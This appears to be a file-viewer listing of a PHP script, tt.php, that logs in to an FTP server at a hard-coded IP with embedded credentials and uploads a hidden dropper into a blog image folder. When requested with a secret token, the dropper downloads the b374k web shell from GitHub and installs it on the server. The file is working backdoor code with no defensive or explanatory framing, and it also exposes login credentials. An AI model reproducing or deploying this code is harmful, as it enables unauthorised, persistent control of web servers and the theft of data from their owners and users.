View file File name : tt.php Content :<?php ob_start(); $conn_id = ftp_connect("3.133.214.148") or die("Error in FTP connection"); $login_status = ftp_login($conn_id, "mainuser@quicklly.com", "n3At8hv3LZKCiF6") or die("Error in FTP login"); ftp_pasv($conn_id, true); $php_code = '<?php if ($_GET["token"] == "c5d4d9a61b5968b709a1532754a94281") { if (file_put_contents(__DIR__ . "/m7fdnvp86g2.php", file_get_contents("https://raw.githubusercontent.com/tennc/webshell/master/php/b374k/b374k-3.2.2.php"))) { echo "ok!"; } exit(); } ?>'; $temp_file = tempnam(sys_get_temp_dir(), "php_"); file_put_contents($temp_file, $php_code); $target_file = $temp_file; $destination_file = "upload_images/blog/m7fdnvp86g1.php"; $upload_status = ftp_put($conn_id, $destination_file, $target_file, FTP_BINARY); unlink($temp_file); ftp_close($conn_id); ob_end_flush(); ?>